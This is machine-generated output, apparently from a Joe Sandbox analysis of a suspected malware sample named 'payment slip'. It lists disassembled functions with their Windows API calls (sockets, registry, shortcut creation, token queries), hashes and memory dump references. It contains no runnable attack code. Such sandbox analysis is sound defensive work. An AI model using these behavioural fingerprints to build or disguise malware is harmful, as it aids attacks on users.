                                        • API String ID: 776569668-0
                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction ID: be38ad5e4142b1e2cb31be17c16b0663645a5ad658ad6024bdd4aee2922864f3
                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction Fuzzy Hash: 57115B71B44B04AADA21BFB0CC47FCF7BDEAF40700F440826B299A6093EA65B5058662
                                        Function 0009DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0009DA74
                                        • LoadStringW.USER32(00000000), ref: 0009DA7B
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0009DA91
                                        • LoadStringW.USER32(00000000), ref: 0009DA98
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0009DADC
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 0009DAB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 4072794657-3128320259
                                        • Opcode ID: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
                                        • Instruction ID: b8d2df8cf751f8701105f5fa7ec7718fed04db13dc119f690d02fc3686e6a65b
                                        • Opcode Fuzzy Hash: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
                                        • Instruction Fuzzy Hash: 360162F25002087FFB10ABA4DD89EEB336CE708301F440496F74AE2041EA789E845F75
                                        Function 000A096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(00E1FE68,00E1FE68), ref: 000A097B
                                        • EnterCriticalSection.KERNEL32(00E1FE48,00000000), ref: 000A098D
                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 000A099B
                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 000A09A9
                                        • CloseHandle.KERNEL32(00000000), ref: 000A09B8
                                        • InterlockedExchange.KERNEL32(00E1FE68,000001F6), ref: 000A09C8
                                        • LeaveCriticalSection.KERNEL32(00E1FE48), ref: 000A09CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
                                        • Instruction ID: f727891f7544705724359d98f1d3c60d17aba02aa6ef717d822668f806153663
                                        • Opcode Fuzzy Hash: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
                                        • Instruction Fuzzy Hash: 72F0EC32442A12BBF7515FA4EE8DFD6BB79FF06702F442025F206908A1C7799565CF90
                                        Function 000B1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 000B1DC0
                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000B1DE1
                                        • WSAGetLastError.WSOCK32 ref: 000B1DF2
                                        • htons.WSOCK32(?,?,?,?,?), ref: 000B1EDB
                                        • inet_ntoa.WSOCK32(?), ref: 000B1E8C
                                          • Part of subcall function 000939E8: _strlen.LIBCMT ref: 000939F2
                                          • Part of subcall function 000B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,000AEC0C), ref: 000B3240
                                        • _strlen.LIBCMT ref: 000B1F35
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                        • String ID:
                                        • API String ID: 3203458085-0
                                        • Opcode ID: 907e112911d67a2603a85ceecf9c5d47d7ed811a422f74e3a768df0637d8fcc9
                                        • Instruction ID: 8b2e81d4557a6ca366ecc5c0d8fe1f31effa627416de70a70080941f5ebafcde
                                        • Opcode Fuzzy Hash: 907e112911d67a2603a85ceecf9c5d47d7ed811a422f74e3a768df0637d8fcc9
                                        • Instruction Fuzzy Hash: F7B1DE70204301AFD324DF24C895FAA7BE9AF84318F94895CF55A5B2A3CB71ED46CB91
                                        Function 00035D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00035D30
                                        • GetWindowRect.USER32(?,?), ref: 00035D71
                                        • ScreenToClient.USER32(?,?), ref: 00035D99
                                        • GetClientRect.USER32(?,?), ref: 00035ED7
                                        • GetWindowRect.USER32(?,?), ref: 00035EF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: 0698ec5e8c03b4ed0f633db73fcf6e80661079cb98a41d1c379efd742fb21d23
                                        • Instruction ID: a2683ce77ea0532d100ed37fc500bb3238098f41cc69d07f8700c9d991b65f86
                                        • Opcode Fuzzy Hash: 0698ec5e8c03b4ed0f633db73fcf6e80661079cb98a41d1c379efd742fb21d23
                                        • Instruction Fuzzy Hash: EDB18B35A0074ADBDB64CFA8C8807EEB7F5FF48311F14841AE8A9D7260DB34AA51DB54
                                        Function 000601B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 000600BA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000600D6
                                        • __allrem.LIBCMT ref: 000600ED
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0006010B
                                        • __allrem.LIBCMT ref: 00060122
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00060140
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                        • Instruction ID: 4d77bd61b663accc678d9751e3a0c2552aca8d2d12cd9714b42d5fc2f3f33ec9
                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                        • Instruction Fuzzy Hash: 83811872A40706ABE7209F78CC41BAB73EAAF41324F24453EF955DB6C2E774D9448790
                                        Function 000661FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000582D9,000582D9,?,?,?,0006644F,00000001,00000001,8BE85006), ref: 00066258
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006644F,00000001,00000001,8BE85006,?,?,?), ref: 000662DE
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000663D8
                                        • __freea.LIBCMT ref: 000663E5
                                          • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        • __freea.LIBCMT ref: 000663EE
                                        • __freea.LIBCMT ref: 00066413
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 8ce244acdae8ed960616c08ff98aff6047be5804d1efdbec35df3e6c98a7257d
                                        • Instruction ID: cbd1560ff7d8335ab52a44faf572cce14d657d990a7c445426dcce90d317b4bf
                                        • Opcode Fuzzy Hash: 8ce244acdae8ed960616c08ff98aff6047be5804d1efdbec35df3e6c98a7257d
                                        • Instruction Fuzzy Hash: E551D372A00226ABEB258F64CC81EBF77ABEF45750F154629FD05D7241EB36DE40C6A0
                                        Function 000BBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBCCA
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBD25
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000BBD6A
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000BBD99
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000BBDF3
                                        • RegCloseKey.ADVAPI32(?), ref: 000BBDFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                        • String ID:
                                        • API String ID: 1120388591-0
                                        • Opcode ID: 486c7a4d749051543be806b3a5538e28a39ebfbe454e5ff2031853443c250238
                                        • Instruction ID: 099fe6a70b12a000cc99c8976a5b00bd5e6bc0e47a73931a6dab04a9ab4f19fd
                                        • Opcode Fuzzy Hash: 486c7a4d749051543be806b3a5538e28a39ebfbe454e5ff2031853443c250238
                                        • Instruction Fuzzy Hash: DA81D270208241EFD715DF24C885EAABBE9FF84308F54895CF4994B2A2DB71ED45CB92
                                        Function 0008F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000035), ref: 0008F7B9
                                        • SysAllocString.OLEAUT32(00000001), ref: 0008F860
                                        • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F889
                                        • VariantClear.OLEAUT32(0008FA64), ref: 0008F8AD
                                        • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F8B1
                                        • VariantClear.OLEAUT32(?), ref: 0008F8BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy$AllocInitString
                                        • String ID:
                                        • API String ID: 3859894641-0
                                        • Opcode ID: c0f3898cbbcc9d65fa733fe506819847343e87198b0a47ed71c4a54a7cd86ec1
                                        • Instruction ID: 0051a7dd34c2c9868658e2387f5309169dac5853808b4ca6d963b30d50a391cc
                                        • Opcode Fuzzy Hash: c0f3898cbbcc9d65fa733fe506819847343e87198b0a47ed71c4a54a7cd86ec1
                                        • Instruction Fuzzy Hash: E351D131600312BADF24BB75D895B7DB3A9FF45310F208466E986DF292DB708C40CBA6
                                        Function 000A910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 000A94E5
                                        • _wcslen.LIBCMT ref: 000A9506
                                        • _wcslen.LIBCMT ref: 000A952D
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 000A9585
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$FileName$OpenSave
                                        • String ID: X
                                        • API String ID: 83654149-3081909835
                                        • Opcode ID: e44f4978c4404dc7d9162c68a826e8f1b9e66498df6fe290b1ffd41aade5f4f5
                                        • Instruction ID: ed5105caf5386126a1abee5de1267f72daf6515aec977b47cfae8dc4ee114f6c
                                        • Opcode Fuzzy Hash: e44f4978c4404dc7d9162c68a826e8f1b9e66498df6fe290b1ffd41aade5f4f5
                                        • Instruction Fuzzy Hash: 39E1A271A083019FD725DF64C881BAEB7E4BF85314F14896DF8899B2A2DB31DD05CB92
                                        Function 0004920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • BeginPaint.USER32(?,?,?), ref: 00049241
                                        • GetWindowRect.USER32(?,?), ref: 000492A5
                                        • ScreenToClient.USER32(?,?), ref: 000492C2
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000492D3
                                        • EndPaint.USER32(?,?,?,?,?), ref: 00049321
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000871EA
                                          • Part of subcall function 00049339: BeginPath.GDI32(00000000), ref: 00049357
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                        • String ID:
                                        • API String ID: 3050599898-0
                                        • Opcode ID: 77dd61041869993c5964b6a6384827e8594cc69771c22a3ee08f7fabbb63dd20
                                        • Instruction ID: 084ac152a72a7c5693e5d0b2cfd33a2f6bc65c65f329fd1059e8369fb663974f
                                        • Opcode Fuzzy Hash: 77dd61041869993c5964b6a6384827e8594cc69771c22a3ee08f7fabbb63dd20
                                        • Instruction Fuzzy Hash: B8419F70104200AFE721DF24CC88FAB7BE8FB4A325F140679F998876A2C7759985DB61
                                        Function 000A07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 000A080C
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 000A0847
                                        • EnterCriticalSection.KERNEL32(?), ref: 000A0863
                                        • LeaveCriticalSection.KERNEL32(?), ref: 000A08DC
                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 000A08F3
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 000A0921
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3368777196-0
                                        • Opcode ID: 186d8086c84d6fd554c65fcf475c285b463a78979bc638a37779a184d388d51f
                                        • Instruction ID: 71259f09b0bc7c67c83d5b6d8c6510bc64e90561b43ce635db7e6e8edfdcf5cc
                                        • Opcode Fuzzy Hash: 186d8086c84d6fd554c65fcf475c285b463a78979bc638a37779a184d388d51f
                                        • Instruction Fuzzy Hash: EF417C71900209EFEF149F94DC85AAAB7B8FF05310F1440B9ED049A297DB34DE65DBA4
                                        Function 00094C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00094C95
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00094CB2
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00094CEA
                                        • _wcslen.LIBCMT ref: 00094D08
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00094D10
                                        • _wcsstr.LIBVCRUNTIME ref: 00094D1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                        • String ID:
                                        • API String ID: 72514467-0
                                        • Opcode ID: 6b0d941d3c7f69c40bb0f3571511f669e80d2f5294a75253e32957096004bec6
                                        • Instruction ID: e5fb9e37c81d5dd5043aaecb2a0de297d0f4b1db03d7578f3acb23c3500075d8
                                        • Opcode Fuzzy Hash: 6b0d941d3c7f69c40bb0f3571511f669e80d2f5294a75253e32957096004bec6
                                        • Instruction Fuzzy Hash: E3210476205200BBFF655B29ED49E7F7BD8DF45750F108039F809CA192EA75CC42A6A0
                                        Function 000A581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                        • _wcslen.LIBCMT ref: 000A587B
                                        • CoInitialize.OLE32(00000000), ref: 000A5995
                                        • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A59AE
                                        • CoUninitialize.OLE32 ref: 000A59CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 3172280962-24824748
                                        • Opcode ID: d8f0e2c173a8407b7911d779ff82c73e2a62ab2aa10b8e4a9438bbb2b7cb37dd
                                        • Instruction ID: e5a5d98775eef7b89711e8b605d24676225dbd06c237bf0208f07ba436b9074d
                                        • Opcode Fuzzy Hash: d8f0e2c173a8407b7911d779ff82c73e2a62ab2aa10b8e4a9438bbb2b7cb37dd
                                        • Instruction Fuzzy Hash: EBD173756087019FC714DF64C880A6ABBE5FF8A712F14885DF8899B362DB31EC45CB92
                                        Function 0009175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                          • Part of subcall function 00090FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                          • Part of subcall function 00090FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                          • Part of subcall function 00090FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                          • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                        • GetLengthSid.ADVAPI32(?,00000000,00091335), ref: 000917AE
                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000917BA
                                        • HeapAlloc.KERNEL32(00000000), ref: 000917C1
                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 000917DA
                                        • GetProcessHeap.KERNEL32(00000000,00000000,00091335), ref: 000917EE
                                        • HeapFree.KERNEL32(00000000), ref: 000917F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                        • String ID:
                                        • API String ID: 3008561057-0
                                        • Opcode ID: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                        • Instruction ID: 571de6aa6e5702d74064996e85e3836c0b7797af20140c2c6ee086486bb4977c
